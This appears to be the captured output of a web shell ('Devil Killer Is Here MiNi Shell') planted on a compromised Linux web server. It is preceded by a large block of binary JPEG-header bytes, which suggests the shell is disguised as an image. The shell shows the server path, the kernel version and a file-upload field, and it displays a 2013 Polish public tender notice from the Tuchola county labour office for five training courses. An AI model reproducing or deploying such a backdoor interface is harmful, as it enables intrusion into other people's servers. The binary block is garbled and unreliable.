JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130305/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130305/88958-N-2013.html

<p class="kh_header"><b>Tuchola: usługa szkoleniowa realizowana dla Powiatowego Urzędu Pracy w Tucholi</b><br>
<b>Numer ogłoszenia: 88958 - 2013; data zamieszczenia: 05.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , pl. Wolności 23, 89-500 Tuchola, woj. kujawsko-pomorskie, tel. 0-52 559 08 00, faks 0-52 559 08 01.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup.tuchola.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> usługa szkoleniowa realizowana dla Powiatowego Urzędu Pracy w Tucholi.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa szkoleniowa realizowana dla Powiatowego Urzędu Pracy w Tucholi. Zamawiający dopuszcza możliwość składania ofert częściowych. Każdy z Wykonawców może złożyć ofertę na jedną lub każdą część zamówienia. Zamówienie składa się z 5 części: Część 1 - Nowe trendy w sztuce kulinarnej, Część 2 - Kelner - barman, Część 3 - Zintegrowany kurs spawania blach i rur spoinami pachwinowymi metodą MAG 135 oraz spawania blach spoinami pachwinowymi metodą MAG 136 drutem proszkowym na uprawnienia Polskiego Rejestru Statków (PRS), Część 4 -Kwalifikacja wstępna przyspieszona dla transportu drogowego na przewóz rzeczy, Część 5 - Szkolenie okresowe dla transportu drogowego na przewóz rzeczy. 
ZAKRES MERYTORYCZNY DOTYCZĄCY KAŻDEJ CZĘŚCI ZAMÓWIENIA:
1. CZAS TRWANIA I SPOSÓB ORGANIZACJI SZKOLENIA
1) Zamawiający wymaga, aby zajęcia odbywały się 5 razy w tygodniu, od poniedziałku do piątku; z wyjątkiem części 1 i części 2, gdzie zajęcia powinny odbywać się od wtorku do soboty, po 8 godzin zegarowych dziennie, z wyjątkiem sytuacji, gdy przepisy wskazane przez Wykonawcę stanowią inaczej - część 4 i część 5 zamówienia, gdzie zajęcia nie mogą przekraczać 7 godzin dziennie.
2) Wszystkie zajęcia muszą być przeprowadzone w jednej grupie szkoleniowej. Godzina zegarowa szkolenia liczy 60 minut i obejmuje zajęcia edukacyjne liczące 45 minut oraz przerwę, liczącą 15 minut. 
3) Zamawiający wyklucza możliwość organizacji zajęć w dni będące dniami ustawowo wolnymi od pracy.
2. MIEJSCE REALIZACJI SZKOLENIA 
1) Miejscem realizacji zajęć w przypadku części 1 i części 2 musi być teren powiatu bydgoskiego lub toruńskiego. Zajęcia muszą odbywać się w minimum trzygwiazdkowych restauracjach działających na tym terenie. Jeżeli miejsce odbywania zajęć teoretycznych będzie inne niż miejsce odbywania zajęć praktycznych, Wykonawca musi zapewnić dojazd uczestnikom szkolenia na te zajęcia. Wykonawca musi zapewnić zakwaterowanie z całodobowym wyżywieniem (śniadanie, obiad, kolacja) uczestnikom szkolenia w trakcie odbywania szkolenia.
2) Miejscem przeprowadzenia szkolenia w przypadku części 3, części 4 i części 5 jest teren miasta Tucholi. Zamawiający dopuszcza realizację szkolenia poza wskazaną miejscowością. W takim przypadku Wykonawca zobowiązany jest zapewnić uczestnikom szkolenia dojazd z Tucholi do miejsca odbywania szkolenia i powrót do Tucholi (czas dojazdu w jedną stronę nie może być dłuższy niż 1 h 30 min.) lub zapewnić zakwaterowanie z całodobowym wyżywieniem (śniadanie, obiad, kolacja).
3. MATERIAŁY DYDAKTYCZNE DLA UCZESTNIKÓW
1)  Każdy uczestnik musi być wyposażony przez wykonawcę na pierwszych zajęciach w bezzwrotne materiały dydaktyczne w formie drukowanej np. skrypty z zakresów tematycznych zawartych w programie szkolenia, zeszyt, długopis. Po ukończeniu szkolenia powyższe materiały staną się własnością uczestnika szkolenia.
2) W przypadku części 1, części 2 i części 3 zamówienia Wykonawca musi zapewnić uczestnikom szkolenia odzież ochronną dostosowaną do rodzaju szkolenia. 
3) W przypadku szkoleń współfinansowanych ze środków Unii Europejskiej materiały dydaktyczne muszą zawierać informację: Szkolenie współfinansowane ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego oraz logotypy Programu Operacyjnego Kapitał Ludzki i Unii Europejskiej; identyczne informacje oraz logotypy powinny być ujęte na prezentacjach i publikacjach multimedialnych zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki wydanymi w dniu 04.02.2009 r. przez Departament Zarządzania EFS MRR.
4. SZKOLENIE MUSI BYĆ PRZEPROWADZONE ZGODNIE Z:
a) programem szkolenia przedstawionym przez Wykonawcę - załącznik nr 10 do SIWZ,
b) zapisami wskazanymi w niniejszym szczegółowym opisie przedmiotu zamówienia.
5. PRZED ROZPOCZĘCIEM KAŻDEGO ZE SZKOLEŃ WYKONAWCA JEST ZOBOWIĄZANY DO przekazania haromonogramu szkolenia do Powiatowego Urzędu Pracy w Tucholi, Plac Wolności 23.
6. SZKOLENIE MUSI SIĘ ZAKOŃCZYĆ WYDANIEM PRZEZ WYKONAWCĘ ZAŚWIADCZENIA O JEGO UKOŃCZENIU:
1) w dniu zakończenia szkolenia, zgodnie z §75 ust.3 rozporządzenia MPiPS z dnia 12 grudnia 2011 r. w sprawie standardów i warunków prowadzenia usług rynku pracy (Dz.U. Nr 279, poz. 1641) zawierającego:
- numer z rejestru,
- imię/imiona i nazwisko oraz numer PESEL uczestnika szkolenia, a w przypadku cudzoziemca numer dokumentu stwierdzającego tożsamość,
- nazwę instytucji szkoleniowej przeprowadzającej szkolenie,
- formę i nazwę szkolenia,
- okres trwania szkolenia,
- miejsce i datę wydania zaświadczenia lub innego dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji,
- tematy i wymiar godzin zajęć edukacyjnych,
- podpis osoby upoważnionej przez instytucję szkoleniową przeprowadzającą szkolenie.
Jeżeli przepisy odrębne stanowią, że konieczne jest wystawienie innego dokumentu potwierdzającego ukończenie szkolenia i nabycie kwalifikacji - Wykonawca zobowiązany jest wystawić dwa lub więcej dokumentów..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.20.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie przez Wykonawcę warunku posiadania uprawnień do wykonywania określonej działalności lub czynności poprzez oświadczenie, że posiada wpis do rejestru instytucji szkoleniowych prowadzony przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej - załącznik nr 6. Ocena spełniania w/w warunku zostanie dokonana wg formuły spełnia/nie spełnia na podstawie złożonych przez Wykonawcę oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie przez Wykonawcę warunku posiadania wiedzy i doświadczenia, jeżeli ten wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, przeprowadził co najmniej dwa szkolenia grupowe minimum 5-osobowe w zakresie odpowiadającym przedmiotowi zamówienia. Ocena spełniania w/w warunku zostanie dokonana wg formuły spełnia/nie spełnia na podstawie złożonych przez Wykonawcę oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie przez Wykonawcę warunku dysponowania odpowiednim potencjałem technicznym do realizacji zamówienia poprzez wykazanie:
a) pomieszczeń umożliwiających realizację zajęć teoretycznych dostosowanych do potrzeb danego szkolenia z uwzględnieniem bezpiecznych i higienicznych warunków realizacji szkolenia, sala szkoleniowa musi być dostosowana do ilości osób szkolonych z odpowiednią liczbą krzeseł i stolików, oświetleniem i ogrzewaniem,
b) wyposażenia dydaktycznego i urządzeń technicznych umożliwiających realizację zajęć teoretycznych tzn. flipchart lub tablica klasyczna lub magnetyczna, sprzęt audiowizualny i inne dodatkowe proponowane przez Wykonawcę,
c) miejsca umożliwiającego realizację zajęć praktycznych dostosowanego do potrzeb danego szkolenia z uwzględnieniem bezpiecznych i higienicznych warunków realizacji szkolenia. Dodatkowo:
w przypadku części nr 1 i nr 2 zamówienia Zamawiający wymaga, aby zajęcia odbywały się w minimum trzygwiazdkowych restauracjach, 
w przypadku części nr 3 zamówienia Zamawiający wymaga, aby warsztat szkoleniowy posiadał aktualny atest uprawniający do prowadzenia szkoleń i egzaminów spawaczy w metodzie MAG,
w przypadku części nr 4 zamówienia Zamawiający wymaga, aby miejsca przeznaczone do jazdy w warunkach specjalnych odpowiadały wymaganiom określonym w § 3 rozporządzenia Ministra Infrastruktury z dnia 01 kwietnia 2010 r. w sprawie szkolenia kierowców wykonujących przewóz drogowy (Dz. U. Nr 53, poz. 314),    
d) wyposażenia lub urządzeń technicznych umożliwiających realizację zajęć praktycznych z uwzględnieniem bezpiecznych i higienicznych warunków pracy przy ich eksploatacji. Dodatkowo:
w przypadku części nr 3 zamówienia Zamawiający wymaga, aby na każdego uczestnika szkolenia przypadało jedno stanowisko spawalnicze. 
w przypadku części nr 4 zamówienia Zamawiający wymaga, aby pojazdy używane do prowadzenia szkolenia kierowców odpowiadały wymaganiom określonym w § 4 rozporządzenia Ministra Infrastruktury z dnia 01 kwietnia 2010 r. w sprawie szkolenia kierowców wykonujących przewóz drogowy (Dz. U. Nr 53, poz. 314). 
Ocena spełniania w/w warunku zostanie dokonana wg formuły spełnia/nie spełnia na podstawie złożonych przez Wykonawcę oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie przez Wykonawcę warunku dysponowania osobami zdolnymi do realizacji zamówienia poprzez wykazanie kadry dydaktycznej posiadającej odpowiednie kwalifikacje i doświadczenie zawodowe zgodne z wykładanym na szkoleniu zagadnieniem. Dodatkowo:
w przypadku części nr 3 zamówienia Zamawiający wymaga, aby kierownik szkolenia spawaczy lub kierownik kursu spawaczy, wykładowcy szkolenia teoretycznego i instruktorzy szkolenia praktycznego posiadali aktualne uprawnienia w swoim zakresie działania, wydane przez odpowiednie instytucje, zgodnie z obowiązującymi normami. Ocena spełniania w/w warunku zostanie dokonana wg formuły spełnia/nie spełnia na podstawie złożonych przez Wykonawcę oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) wypełniony i podpisany przez uprawnionego przedstawiciela do reprezentowania Wykonawcy FORMULARZ OFERTOWY - załącznik nr 2 do SIWZ, 2) oświadczenie na druku stanowiącym załącznik nr 5 do SIWZ, potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem składania ofert, (w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie składa każdy z podmiotów występujących wspólnie), 3)	wypełniony i podpisany przez uprawnionego przedstawiciela do reprezentowania Wykonawcy PROGRAM SZKOLENIA - załącznik nr 10 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Doświadczenie Wykonawcy w prowdzeniu szkoleń w przedmiotowym zakresie - 20</li>
<li>3 - Certyfikat jakości usług ISO - 30</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian zawartej umowy w przypadku:
a) zmiany terminu realizacji zamówienia,
b) zmiany liczby uczestników szkolenia w przypadku:
- niepodjęcia lub rezygnacji uczestnika ze szkolenia,
- niestawienia się uczestnika na szkolenie,
- przerwania przez uczestnika udziału w szkoleniu,
- stwierdzenia niezdolności uczestnika do udziału w szkoleniu,
- skierowania mniejszej liczby osób na szkolenia z powodu przyczyn niezależnych od Zamawiającego,
c) zmiany osób, które będą uczestniczyły w wykonywaniu zamówienia w wyniku zdarzeń, których Wykonawca nie mógł wcześniej przewidzieć (np. choroba, wypadek, śmierć, rozwiązanie umowy o pracę lub umowy cywilnoprawnej),
d) zmiany miejsca odbywania szkolenia w wyniku zdarzeń losowych, których Wykonawca nie mógł wcześniej przewidzieć,
e) konieczność wprowadzenia zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy,
f) zmiany te są korzystne dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup.tuchola.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy Plac Wolności 23 89-500 Tuchola.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.03.2013 godzina 09:00, miejsce: siedziba Zamawiającego, sekretariat pok. nr 201 - II piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> szkolenie finansowane będzie ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Program Operacyjny Kapitał Ludzki Poddziałanie 6.1.3  Poprawa zdolności do zatrudnienia oraz podnoszenie poziomu aktywności zawodowej osób bezrobotnych Projekt pt. Moja szansa.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Nowe trendy w sztuce kulinarnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Liczba szkoleń i uczestników szkolenia
a) czas realizacji szkolenia - 35 dni
b) liczba szkoleń - 1
c) termin realizacji zamówienia - od dnia podpisania umowy do dnia 31.05.2013 r.
d) liczba uczestników szkolenia - 8 
2) Wymagania wstępne dla uczestników szkolenia
Szkolenie przeznaczone jest dla osób bezrobotnych, poszukujących pracy z art. 43 ustawy o promocji zatrudnienia i instytucjach rynku pracy posiadających aktualne zaświadczenie lekarskie wydane przez lekarza medycyny pracy, stwierdzające brak przeciwwskazań do udziału w w/w szkoleniu. Na badania lekarskie kandydatów na szkolenie skieruje Zamawiający.
3) Cel szkolenia 
Zdobycie wiedzy i umiejętności na temat przygotowania oraz organizacji i obsługi imprez okolicznościowych przy udziale nowoczesnego sprzętu gastronomicznego.
4) Program szkolenia
Program szkolenia - 280 godzin zrealizowanych w ciągu 35 dni.
Program szkolenia powinien obejmować m.in. następujące moduły: 
Zajęcia teoretyczne - 32 godz.
- podstawowe zagadnienia z zakresu bhp, p.poż. oraz pierwszej pomocy,
- zapoznanie się z podstawowymi zasadami systemu HACCP,
- higiena produkcji kuchennej,
- zasady higieny produktów surowych i gotowych,
- charakterystyka zagrożeń i zatruć - podstawowe zagadnienia,
- obróbka wstępna i termiczna produktów spożywczych dla zachowania ich walorów smakowych i bezpiecznego przechowywania,
- zasady organizacji pracy w kuchni,
- zapoznanie się z nowoczesnymi urządzeniami i sprzętem kuchennym (piec konwekcyjno-parowy, piec konwekcyjny, trzon kuchenny, grill gładki, ryflowany, bemar, schładzarka szokowa itp.),
- zasady i rola współpracy pomiędzy personelem kuchni i sali a satysfakcja konsumenta,
- nowe trendy sztuki kulinarnej na stołach bankietowych, okolicznościowych i świątecznych (sztuka aranżacji i prezentacji potraw na talerzach w serwisie kulinarnym - jakość, estetyka), 
- tworzenie kuchni tradycyjnej z uwzględnieniem sezonowości produktów tej kuchni,
- tworzenie charakterystycznej kuchni regionalnej z uwzględnieniem sezonowości produktów tej kuchni,
- tworzenie kuchni myśliwskiej z uwzględnieniem sezonowości produktów tej kuchni,
- karta menu (w tym jej sezonowość).

Zajęcia praktyczne - 240 godz., w tym:
Kuchnia tradycyjna - 80 godz.
- pobieranie surowców i półproduktów do produkcji kulinarnej,
- rodzaje zup i ich sporządzanie,
- charakterystyka i zastosowanie podrobów w gastronomii,
- techniki sporządzania potraw z mięsa,
- techniki sporządzania potraw z ryb,
- sporządzanie sosów gorących i zimnych,
- sporządzanie deserów różnymi technikami,
- sporządzanie napojów gorących i zimnych,
- sporządzanie zakąsek,
- sporządzanie surówek i sałatek,
- sporządzanie potraw z kasz i jaj,
- wybrane zagadnienia z żywienia dietetycznego (dieta lekkostrawna, wysokobiałkowa, niskotłuszczowa).
Kuchnia regionalna - 80 godz.
- charakterystyka kuchni regionalnej,
- pobieranie surowców i półproduktów do produkcji kulinarnej,
- przygotowanie wybranych potraw z kuchni regionalnej,
- sezonowość produktów kuchni regionalnej,
- przygotowanie regionalnych potraw dietetycznych.
Kuchnia myśliwska - 80 godz.
- charakterystyka kuchni myśliwskiej,
- potrawy z mięsa: dzika, jelenia, sarny, daniela i zwierzyny drobnej (duszone, smażone, pieczone, z rusztu, z rożna),
- rosoły,
- farsze, pasztety,
- marynaty, solanki, bejce i zalewy,
- sosy.
Egzamin wewnętrzny - 8 godz. 
- 2 godziny część teoretyczna,
- 6 godzin część praktyczna..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.20.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2013.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kelner - barman.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Liczba szkoleń i uczestników szkolenia
a) czas realizacji szkolenia - 15 dni
b) liczba szkoleń - 1
c) termin realizacji zamówienia - od dnia podpisania umowy do dnia 31.05.2013 r.
d) liczba uczestników szkolenia - 8 
2) Wymagania wstępne dla uczestników szkolenia
